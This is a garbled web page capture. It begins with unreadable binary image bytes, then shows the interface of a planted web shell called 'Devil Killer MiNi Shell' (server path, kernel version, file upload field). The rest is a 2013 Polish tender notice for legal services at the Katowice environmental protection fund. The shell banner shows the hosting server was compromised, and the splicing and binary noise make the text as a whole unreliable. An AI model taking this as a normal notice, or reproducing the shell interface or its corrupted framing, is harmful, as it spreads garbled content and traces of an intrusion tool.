JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131104/447968-N-2013.html

<p class="kh_header"><b>Katowice: świadczenie stałej obsługi prawnej w Wojewódzkim Funduszu Ochrony Środowiska i Gospodarki Wodnej w Katowicach.</b><br>
<b>Numer ogłoszenia: 447968 - 2013; data zamieszczenia: 04.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Katowicach , ul. Plebiscytowa 19, 40-035 Katowice, woj. śląskie, tel. 32 6032200, faks 32 2510406.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wfosigw.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie stałej obsługi prawnej w Wojewódzkim Funduszu Ochrony Środowiska i Gospodarki Wodnej w Katowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 
Przedmiotem zamówienia w zakresie zadania nr 1 jest świadczenie stałej pomocy prawnej polegającej w szczególności na: 
a)udzielaniu porad prawnych;
b)udzielaniu bieżących konsultacji prawnych;
c)sporządzaniu opinii prawnych;
d)opiniowaniu projektów umów;
e)opiniowaniu dokumentów objętych działalnością prowadzoną przez Zamawiającego (WFOŚiGW) w tym projektów uchwał Rady Nadzorczej;
f)opiniowaniu wewnętrznych dokumentów (regulaminów, instrukcji, zarządzeń, etc.) związanych z działalnością Zamawiającego; 
g)reprezentowaniu Zamawiającego w postępowaniach sądowych, administracyjnych, sądowo-administracyjnych, egzekucyjnych, arbitrażowych oraz przed osobami trzecimi;
h)reprezentowaniu Zamawiającego oraz udział w prowadzonych przez niego negocjacjach, rokowaniach i spotkaniach;
i)bieżącym informowaniu o zmianach w prawie mających wpływ na działalność prowadzoną przez Zamawiającego, w tym w formie cyklicznych - miesięcznych - informacji oraz ewentualnych spotkań/szkoleń z pracownikami Zamawiającego; 
j)doradztwie w rozpatrywaniu prawnych form zabezpieczeń, wierzytelności Zamawiającego;
k)doradztwie w sprawach windykacji należności;
l)wykonywaniu innych czynności o charakterze pomocy prawnej;
m)udzielaniu doraźnych roboczych konsultacji (telefonicznie lub mailowo),
n)świadczeniu pomocy prawnej obejmującej w szczególności następujące dziedziny: 
prawo ochrony środowiska, ustawa o zapobieganiu szkodom w środowisku, 
ustawa o odpadach, ustawa o utrzymaniu porządku i czystości w gminie, 
prawo wodne;prawo cywilne, prawo handlowe, prawo finansowe, dyscyplina finansów publicznych, prawo podatkowe, prawo administracyjne, pomoc publiczna, prawo unijne, prawo bankowe, prawo budowlane, ustawa o działalności leczniczej,dochodzenie należności w tym m.in.: prawo upadłościowe i naprawcze, postępowanie sądowe, pozasądowe i egzekucyjne.

Zadanie nr 2 
Przedmiotem zamówienia w zakresie zadania nr 2 jest świadczenie stałej pomocy prawnej polegającej w szczególności na:
a)udzielaniu pomocy prawnej w zakresie związanym z działalnością organów statutowych Zamawiającego i ich relacji z organami administracji publicznej;
b)sygnalizowaniu i opiniowaniu projektowanych rozwiązań legislacyjnych mających związek z działalnością statutową Zamawiającego;
c)sporządzaniu opinii prawnych w zakresie odnoszącym się do udzielania pomocy publicznej i nadzoru z tym związanego;
d)wydawaniu opinii prawnych w sprawach wiążących się z możliwością zaangażowania Zamawiającego w postępowanie przed sądami i innymi organami;
e)sporządzaniu opinii prawnych w zakresie Ustawy Prawo zamówień publicznych, w tym również w zakresie postępowań realizowanych w ramach POIiŚ, z  uwzględnieniem zgodności tych postępowań z prawem UE;
f)sporządzaniu opinii prawnych w zakresie Prawa pracy;
g)sporządzaniu opinii prawnych w zakresie dotyczącym zaangażowania Funduszu w obsługę zagranicznych środków pomocowych;
h)prowadzeniu postępowań administracyjnych oraz sporządzanie pism i projektów decyzji w postępowaniach administracyjnych dotyczących zwrotu, umarzania, rozkładania na raty i odraczania terminów spłaty należności z tytułu płatności dokonanych w ramach środków pochodzących z Unii Europejskiej,
i)udzielaniu doraźnych roboczych konsultacji (telefonicznie lub mailowo),
j)udziale w spotkaniach z beneficjentami, dla których Fundusz pełni rolę Instytucji Wdrażającej ( przewidywana liczba spotkań w ciągu roku - nie więcej niż 5),
k)zastępstwie prawnym Zamawiającego w postępowaniu administracyjnym, sądowym i sądowo-administracyjnym w zakresie zadań wymienionych powyżej w lit. a) do g)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8, 79.11.10.00-5, 79.11.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia w tym zakresie szczegółowego warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku dotyczącego wiedzy i doświadczenia, Zamawiający wymaga wykonania lub wykonywania, w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
W zakresie zadania nr 1:
3 usług świadczenia stałej obsługi prawnej, w tym co najmniej: 
1)1 usługę świadczenia stałej obsługi prawnej w zakresie problematyki ochrony środowiska lub odpadów. 
2)1 usługę świadczenia stałej obsługi prawnej w zakresie problematyki prawa cywilnego i postępowania cywilnego.
3)1 usługę świadczenia stałej obsługi prawnej w sektorze usług finansowych w zakresie problematyki obejmującej prawne formy zabezpieczenia spłat, dochodzenia należności w postępowaniach sądowych, pozasądowych i egzekucyjnych, prawa upadłościowego i naprawczego.
Każda usługa powinna być świadczona przez okres co najmniej roku.
W zakresie zadania nr 2:
3 usług świadczenia stałej obsługi prawnej, w tym co najmniej:
1)1 usługę świadczenia stałej obsługi prawnej w zakresie administracji samorządowej lub rządowej;
2)1 usługę świadczenia stałej obsługi prawnej w zakresie pomocy publicznej.
3)1 usługę świadczenia stałej obsługi prawnej w zakresie problematyki zamówień publicznych w tym realizowanych z wykorzystaniem środków unijnych.
Każda usługa powinna być świadczona przez okres co najmniej roku.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia w tym zakresie szczegółowego warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga by Wykonawca/y do realizacji niniejszego zamówienia dysponowali co najmniej następującymi osobami (Zespołem Wykonawcy), spełniającymi poniższe wymagania:
W zakresie zadania nr 1 - co najmniej 3 prawnikami:
Prawnik nr 1 posiadający: 
a)wpis na listę radców prawnych lub adwokatów;
b)co najmniej 2 - letnie doświadczenie w świadczeniu usług obsługi prawnej obejmującej problematykę ochrony środowiska lub odpadów.
Prawnik nr 2 posiadający:
a)wpis na listę radców prawnych lub adwokatów;
b)co najmniej 2 - letnie doświadczenie w świadczeniu usług obsługi prawnej obejmującej problematykę prawa cywilnego i postępowania cywilnego.
Prawnik nr 3 posiadający:
a) wpis na listę radców prawnych lub adwokatów;
b) co najmniej 3 - letnie doświadczenie w świadczeniu usług obsługi prawnej w sektorze usług finansowych obejmującej problematykę prawnych form zabezpieczenia spłat, windykacji należności w postępowaniach sądowych, pozasądowych i egzekucyjnych, prawa upadłościowego i naprawczego.

W zakresie zadania nr 2 - co najmniej 2 prawnikami:
Prawnik nr 1 posiadający: 
a)wpis na listę radców prawnych lub adwokatów;
b)co najmniej 2 - letnie doświadczenie w świadczeniu usług obsługi prawnej w zakresie administracji samorządowej lub rządowej.
Prawnik nr 2 posiadający:
a)wpis na listę radców prawnych lub adwokatów;
b)co najmniej 2 - letnie doświadczenie w świadczeniu usług obsługi prawnej w zakresie pomocy publicznej,
c)co najmniej 2 - letnie doświadczenie w świadczeniu usług obsługi prawnej 
w zakresie problematyki zamówień publicznych w tym realizowanych 
z wykorzystaniem środków unijnych.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie warunku sytuacji finansowej i ekonomicznej Zamawiający wymaga posiadania przez Wykonawców aktualnego ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczeniową nie mniejszą niż 400.000,00 PLN. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający oceniał będzie ich łączną sumę ubezpieczeniową. 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie należy wskazać usługi określone w pkt. III.3.2) niniejszego ogłoszenia, potwierdzające spełnianie określonego w tym punkcie warunku udziału w postępowaniu, oraz załączyć poświadczenia (lub inne dowody) potwierdzające, że usługi te zostały wykonane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Celem wyłonienia wykonawców, którzy zostaną zaproszeni do składania ofert, każdemu Wykonawcy, który spełni warunki udziału w postępowaniu,  zostanie przyznana punktacja wg następujących reguł:
a)warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W związku z faktem iż Zamawiający nie stawia w tym zakresie szczegółowego warunku, nie będzie on punktowany. 
b)warunek posiadania wiedzy i doświadczenia - Wykonawca otrzyma jeden punkt za każdą wykazaną usługę świadczenia obsługi prawnej w zakresach określonych dla poszczególnych zadań ponad wymagane niezbędne minimum, przy czym maksymalnie Wykonawca może otrzymać 5 punktów;
c)warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Wykonawca otrzyma jeden punkt za każdego wskazanego prawnika, posiadającego kwalifikacje i doświadczenie w zakresie opisanym dla poszczególnych zadań ponad wymagane niezbędne minimum, przy czym maksymalnie Wykonawca może otrzymać 5 punktów;
W przypadku wykazania spełnienia powyższych warunków na poziomie minimalnym wymaganym w ogłoszeniu o zamówieniu, Wykonawca otrzyma 0 punktów.
d)warunek sytuacji ekonomicznej i finansowej - warunek ten nie będzie punktowany;
e)warunek niepodleganiu wykluczeniu z postępowania warunek ten nie będzie punktowany.
Do składania ofert w ramach każdego z zadań zamawiający zaprosi pięciu Wykonawców, którzy spełniają warunki udziału w postępowaniu i  uzyskają najwyższą ocenę punktową tych warunków. Jeżeli na ostatnim z kwalifikujących się miejsc liczba wykonawców, którzy spełniają warunki udziału w postępowaniu i otrzymali oceny punktowe kwalifikujące ich do zaproszenia do składania ofert, będzie większa niż jeden, Zamawiający zaprosi wszystkich tych Wykonawców. Jeżeli liczba Wykonawców spełniających warunki udziału w postępowaniu będzie mniejsza niż pięć, Zamawiający zaprosi do składania ofert wszystkich tych Wykonawców.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
nastąpi w Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wfosigw.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Katowicach
Ul. Plebiscytowa 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2013 godzina 10:00, miejsce: Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Katowicach
Ul. Plebiscytowa 19, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone jest w formie pisemnej. 
Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
Zamawiający dopuszcza składanie ofert częściowych, przy czym jeden wykonawca może złożyć ofertę wyłącznie na jedną część.  
Koperty należy opisać w następujący sposób:
Wniosek o dopuszczenie do udziału w postępowaniu na świadczenie obsługi prawnej w WFOŚiGW w Katowicach. Nie otwierać przed 14.11.2013r. przed godz. 10:30.
SIWZ zostanie przekazana Wykonawcom wraz z zaproszeniem do składania ofert.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 
Jeżeli wartość wymaganego ubezpieczenia OC w zakresie prowadzonej działalności podana będzie w walucie obcej, wartość ta zostanie przeliczona na złote wg kursu walut NBP obowiązującego w dniu składania wniosków o dopuszczenie do udziału w postępowaniu.
Jeżeli wniosek o dopuszczenie do udziału w postępowaniu składa w imieniu Wykonawcy pełnomocnik, to Wykonawca wraz z wnioskiem winien złożyć stosowne pełnomocnictwo (oryginał lub kopię potwierdzoną notarialnie za zgodność z oryginałem).
Wszystkie dokumenty składane przez Wykonawcę w formie kserokopii powinny być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę przez Niego umocowaną.
